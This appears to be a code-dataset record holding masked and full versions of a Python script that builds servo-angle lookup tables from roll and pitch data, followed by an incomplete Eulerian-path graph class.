var_name=\"Normalization\",\n value_name=\"Value\",\n )\n self.hplc = hplc\n\n def renormalize_fplc(self, norm_range, strict):\n if self.fplc is None:\n raise ValueError(\"No FPLC data\")\n\n fplc = self.fplc.pivot(\n index=[\"mL\", \"CV\", \"Fraction\", \"Channel\", \"Sample\"],\n columns=[\"Normalization\"],\n )[\"Value\"].reset_index()\n fplc = fplc.groupby([\"Sample\", \"Channel\"], group_keys=False).apply(\n lambda x: normalizer(x, norm_range, strict)\n )\n fplc = fplc.melt(\n id_vars=[\"mL\", \"CV\", \"Channel\", \"Fraction\", \"Sample\"],\n value_vars=[\"Signal\", \"Normalized\"],\n var_name=\"Normalization\",\n value_name=\"Value\",\n )\n self.fplc = fplc\n\n def reduce_hplc(self, num_points):\n # reduce the number of points in the hplc trace to num_points per sample/channel/norm\n\n def reduction_factor(df, final_points):\n reduction_factor = ceil(df.shape[0] / final_points)\n return 
df[::reduction_factor]\n\n try:\n self.hplc = self.hplc.groupby(\n [\"Channel\", \"Sample\", \"Normalization\"], group_keys=False, as_index=False\n ).apply(lambda x: reduction_factor(x, num_points))\n self.hplc = self.hplc.reset_index(drop=True)\n except AttributeError:\n return\n\n def rename_channels(self, channel_name_dict):\n self.hplc = self.hplc.replace({\"Channel\": channel_name_dict})\n\n def hplc_csv(self, outfile):\n if outfile[-4:] == \".csv\":\n outfile = outfile[:-4]\n if self.hplc is not None:\n self.hplc.to_csv(outfile + \"-long.csv\", index=False)\n self.wide.to_csv(outfile + \"-wide.csv\", index=True)\n\n return outfile + \"-long.csv\"\n\n def fplc_csv(self, outfile):\n if outfile[-4:] != \".csv\":\n outfile = outfile + \".csv\"\n\n if self.fplc is not None:\n self.fplc.to_csv(outfile, index=False)\n return outfile\n\n def save_csvs(self, path):\n hplc_csv = self.hplc_csv(os.path.join(path, f\"{self.id}_hplc\"))\n fplc_csv = self.fplc_csv(os.path.join(path, f\"{self.id}_fplc\"))\n\n return hplc_csv, fplc_csv\n\n\ndef concat_experiments(exp_list):\n hplcs = []\n fplcs = []\n\n for exp in [x for x in exp_list if x.hplc is not None]:\n hplc = exp.hplc\n hplc[\"Sample\"] = f\"{exp.id}: \" + hplc[\"Sample\"].astype(str)\n hplcs.append(hplc)\n\n for exp in [x for x in exp_list if x.fplc is not None]:\n fplc = exp.fplc\n fplc[\"Sample\"] = exp.id\n fplcs.append(fplc)\n\n concat_exp = Experiment(\"concat\")\n try:\n concat_exp.hplc = pd.concat(hplcs)\n except ValueError:\n pass\n\n try:\n concat_exp.fplc = pd.concat(fplcs)\n except ValueError:\n pass\n\n return concat_exp\n",
"step-ids": [
11,
14,
19,
20,
21
]
}
|
[
11,
14,
19,
20,
21
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
<|reserved_special_token_0|>
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
<|reserved_special_token_0|>
df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
<|reserved_special_token_0|>
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
<|reserved_special_token_0|>
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df = pd.read_csv(
'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'
)
df = df.apply(pd.to_numeric, errors='coerce')
df = df.dropna()
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')
df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)
df_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']
].apply(tuple, axis=1)
df_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=
'left_rel_angle')
df_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=
'right_rel_angle')
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')
df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
data = []
row = []
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
df_concat = pd.DataFrame(data=data)
df_concat = df_concat.astype(str)
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv(
'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'
)
df = df.apply(pd.to_numeric, errors='coerce')
df = df.dropna()
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')
df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)
df_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']
].apply(tuple, axis=1)
df_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=
'left_rel_angle')
df_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=
'right_rel_angle')
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)
df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')
df_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')
data = []
row = []
for i in range(-55, 52):
row = []
for j in range(-21, 23):
tup = df_sorted_left[j][i], df_sorted_right[j][i]
row.append(tup)
data.append(row)
df_concat = pd.DataFrame(data=data)
df_concat = df_concat.astype(str)
df_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import pandas as pd
import csv
import numpy as np
import matplotlib.pyplot as plt

# Import csv file with recorded left/right servo angles and their
# corresponding roll and pitch values (change to your csv file path).
df = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv')

# Coerce every cell to numeric and drop the rows that failed to parse (NaN).
df = df.apply(pd.to_numeric, errors='coerce')
df = df.dropna()

# Scatter plot of all available left and right servo angles.
plt.scatter(df['left_rel_angle'], df['right_rel_angle'])
plt.xlabel('Left servo angle(deg)')
plt.ylabel('Right servo angle(deg)')
plt.title('Plot of left and right servo values')
plt.show()

# Scatter plot of all available roll and pitch angles.
plt.scatter(df['roll'], df['pitch'])
plt.xlabel('Roll(deg)')
plt.ylabel('Pitch(deg)')
plt.title('Plot of roll and pitch values')
plt.show()

# Truncate roll/pitch to integers so identical poses can be grouped.
df['roll'] = df['roll'].astype('int8')
df['pitch'] = df['pitch'].astype('int8')

# Average the servo angles over every distinct (pitch, roll) pose.
# (A sort_values pass that was immediately overwritten by this groupby
# has been removed as dead code.)
df_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()
df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')
df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')

# Pair the two servo angles per pose (kept for inspection/debugging).
df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1)

# Reshape into lookup tables: rows indexed by pitch, columns by roll,
# one table per servo.
df_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values='left_rel_angle')
df_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values='right_rel_angle')

# For every empty cell, copy the nearest available value in the same row.
df_sorted_left.bfill(axis='columns', inplace=True)
df_sorted_left.ffill(axis='columns', inplace=True)
df_sorted_right.bfill(axis='columns', inplace=True)
df_sorted_right.ffill(axis='columns', inplace=True)

df_sorted_left = df_sorted_left.astype('int8')
df_sorted_right = df_sorted_right.astype('int8')

# Save the left and right servo tables locally (debugging step).
df_sorted_left.to_csv(r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv')
df_sorted_right.to_csv(r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv')

# Build the combined table of (left_servo_angle, right_servo_angle) tuples.
# NOTE(review): the pitch range (-55..51) and roll range (-21..22) are
# hard-coded to match this data set — check left_test.csv/right_test.csv
# and adjust before reusing with other recordings.
data = []
for i in range(-55, 52):        # pitch (rows)
    row = []
    for j in range(-21, 23):    # roll (columns)
        row.append((df_sorted_left[j][i], df_sorted_right[j][i]))
    data.append(row)

df_concat = pd.DataFrame(data=data)
df_concat = df_concat.astype(str)
df_concat.to_csv(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')

'''
Run the next two lines after you open the csv file and edited the following:
1. change all "(" to "{"
2. change all ")" to "}"
3. delete the first column (index column)
'''
# df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')
# np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline="}, \n {", header="#ifndef NECK_H_\n#define NECK_H_")
|
flexible
|
{
"blob_id": "fd7961d3a94b53ae791da696bb2024165db8b8fc",
"index": 5354,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\n<mask token>\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\n<mask token>\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\n<mask token>\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\n<mask token>\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n",
"step-3": "<mask token>\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test 
files/mid_servo_2.csv')\n<mask token>\n",
"step-4": "import pandas as pd\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = 
df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n",
"step-5": "import pandas as pd\r\nimport csv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#import csv file with recorded left, right servo angles and their corresponding roll and pitch values\r\ndf = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv') #change address to csv file address\r\n\r\n#remove all the NaN rows\r\ndf = df.apply (pd.to_numeric, errors='coerce')\r\ndf = df.dropna()\r\n\r\n#scatter plot of all avaiable left and right servo angles\r\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\r\nplt.xlabel('Left servo angle(deg)')\r\nplt.ylabel('Right servo angle(deg)')\r\nplt.title('Plot of left and right servo values')\r\nplt.show()\r\n\r\n#scatter plot of all avaiable roll and pitch angles\r\nplt.scatter(df['roll'], df['pitch'])\r\nplt.xlabel('Roll(deg)')\r\nplt.ylabel('Pitch(deg)')\r\nplt.title('Plot of roll and pitch values')\r\nplt.show()\r\n\r\n#change to integer\t\r\ndf['roll'] = df['roll'].astype('int8')\r\ndf['pitch'] = df['pitch'].astype('int8')\r\n\r\n#sort df by roll(ascending) and then pitch(ascending) \r\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\r\n\r\n#group dataframe by roll and pitch values (i.e. 
collect the data sets with the same roll and pitch outputs) and calculate the mean for left and right servo values\r\ndf_sorted = df.groupby(['pitch','roll']).mean().reset_index()\r\n\r\n#change left and right servo values to integer\r\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\r\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\r\n\r\n#group left and right servo value together into a tuple\r\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1)\r\n\r\n#change table format to row index:pitch, column index: roll, create two tables with left and right servo angles\r\ndf_sorted_left = df_sorted.pivot(index ='pitch', columns='roll', values='left_rel_angle')\r\ndf_sorted_right = df_sorted.pivot(index ='pitch', columns='roll', values='right_rel_angle')\r\n\r\n#for every cell that is empty, write it a value of it's left or right most adjacent available cell\r\ndf_sorted_left.bfill(axis ='columns', inplace = True)\r\ndf_sorted_left.ffill(axis ='columns', inplace = True)\r\ndf_sorted_right.bfill(axis ='columns', inplace = True)\r\ndf_sorted_right.ffill(axis ='columns', inplace = True)\r\n\r\n#change table type to integer\r\ndf_sorted_left = df_sorted_left.astype('int8')\r\ndf_sorted_right = df_sorted_right.astype('int8') \r\n\r\n#save the left and right servo table files locally (debugging step)\r\ndf_sorted_left.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\r\ndf_sorted_right.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\r\n\r\n#create empty data table and row \r\ndata = []\r\nrow = []\r\n\r\nfor i in range(-55,52): #for i in pitch range (rows); check the left_test.csv or right_test.csv file to find out the range of pitch values \r\n\trow = []\r\n\tfor j in range(-21, 23): #for j in roll range (column); check the left_test.csv or right_test.csv file to find out the range of pitch values\r\n\t\ttup = (df_sorted_left[j][i], 
df_sorted_right[j][i]) #create a tuple in the format of (left_serve_angle, right_servo_angle)\r\n\t\t# print(i,j)\r\n\t\t# print(tup)\r\n\t\trow.append(tup) #apend tuple to row\r\n\tdata.append(row) #append row to data\r\n\r\ndf_concat = pd.DataFrame(data=data)\r\n# df_concat = df_concat.applymap(str)\r\ndf_concat = df_concat.astype(str)\r\ndf_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n\r\n# df_concat = df_concat.str.replace('(','{')\r\n# df_concat = df_concat.str.replace(')','},')\r\n# df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/tabblepeggy_2_angle_reference_TEST.csv')\r\n\r\n'''\r\nRun the next two lines after you open the csv file and edited the following:\r\n1. change all \"(\" to \"{\"\r\n2. change all \")\" to \"}\"\r\n3. delete the first column (index column) \r\n'''\r\n# df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n# np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline=\"}, \\n {\", header=\"#ifndef NECK_H_\\n#define NECK_H_\")\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class EulerianPath:
<|reserved_special_token_0|>
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
def main():
g = Graph(13)
with open('../resources/tinyG.txt') as f:
for line in f.readlines():
vertices = ' '.join(line.splitlines()).split(' ')
if len(vertices) < 2:
continue
else:
v1, v2 = int(vertices[0]), int(vertices[1])
g.add_edge(v1, v2)
print(g)
euler = EulerianPath(g)
print(euler)
print('Eulerian path: ')
if euler.has_eulerian_path():
for v in euler.path():
print(f'{v} ')
print()
else:
print('None')
print()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from graphs.edge import Edge
from graphs.graph import Graph
from collections import deque, defaultdict
class EulerianPath:
_path = deque()
class EEdge(Edge):
def __init__(self, v=0, w=0, is_used=False):
super().__init__(v, w)
self._is_used = is_used
def get_is_used(self):
return self._is_used
def __repr__(self):
return (
f'<{self.__class__.__name__}(v={super().get_v()}, w={super().get_w()}, weight={super().weight()}, _is_used={self.get_is_used()})>'
)
def __init__(self, g):
self.g = g
odd_degree_vertices = 0
self.adj = deque()
for v in range(g.get_V()):
self.adj.append(EulerianPath.EEdge(v))
s = EulerianPath.__non_isolated_vertex(g)
for v in range(g.get_V()):
if g.degree(v) % 2 != 0:
odd_degree_vertices += 1
s = v
if odd_degree_vertices > 2:
return
if s == -1:
s = 0
adj = self.adj
for v in range(g.get_V()):
self_loops = 0
for w in g.adj_vertices(v):
if v == w.item:
if self_loops % 2 == 0:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
self_loops += 1
elif v < w.item:
e = EulerianPath.EEdge(v, w.item)
adj[v].append(e)
adj[w.item].append(e)
stack = deque()
stack.append(s)
while stack is not None:
v = stack.pop()
while adj[v] is not None:
edge = adj[v].popleft()
print(edge)
if edge.get_is_used():
continue
edge._is_used = True
stack.append(v)
v = edge.other(v)
self.get_path().append(v)
if len(self.get_path()) != g.get_E() + 1:
self._path = None
def get_path(self):
return self._path
def path(self):
yield from list(self.get_path())
def has_eulerian_path(self):
return self.get_path() is not None
@staticmethod
def __non_isolated_vertex(g):
for v in range(g.get_V()):
if g.degree(v) > 0:
return v
return -1
def __repr__(self):
return f'adj = {self.adj}, \npath={self.get_path()}'
def main():
g = Graph(13)
with open('../resources/tinyG.txt') as f:
for line in f.readlines():
vertices = ' '.join(line.splitlines()).split(' ')
if len(vertices) < 2:
continue
else:
v1, v2 = int(vertices[0]), int(vertices[1])
g.add_edge(v1, v2)
print(g)
euler = EulerianPath(g)
print(euler)
print('Eulerian path: ')
if euler.has_eulerian_path():
for v in euler.path():
print(f'{v} ')
print()
else:
print('None')
print()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
"""
eulerian_path.py
An Eulerian path, also called an Euler chain, Euler trail, Euler walk, or "Eulerian" version of any of these
variants, is a walk on the graph edges of a graph which uses each graph edge in the original graph exactly once.
A connected graph has an Eulerian path iff it has at most two graph vertices of odd degree.
The EulerianPath class represents a data type
* for finding an Eulerian path in a graph.
* An Eulerian path is a path (not necessarily simple) that
* uses every edge in the graph exactly once.
* This implementation uses a non-recursive depth-first search.
* The constructor takes Theta(E + V) time in the worst
* case, where E is the number of edges and V is
* the number of vertices.
* Each instance method takes Theta(1) time.
* It uses Theta(E + V) extra space in the worst case
* (not including the digraph).
"""
from graphs.edge import Edge
from graphs.graph import Graph
from collections import deque, defaultdict
class EulerianPath:
    """Find an Eulerian path in an undirected Graph via iterative DFS.

    After construction, has_eulerian_path() reports whether a path was
    found and path() yields its vertices in order.
    """

    # Stack of vertices forming the Eulerian path.
    # NOTE(review): this is a *class* attribute shared by every instance;
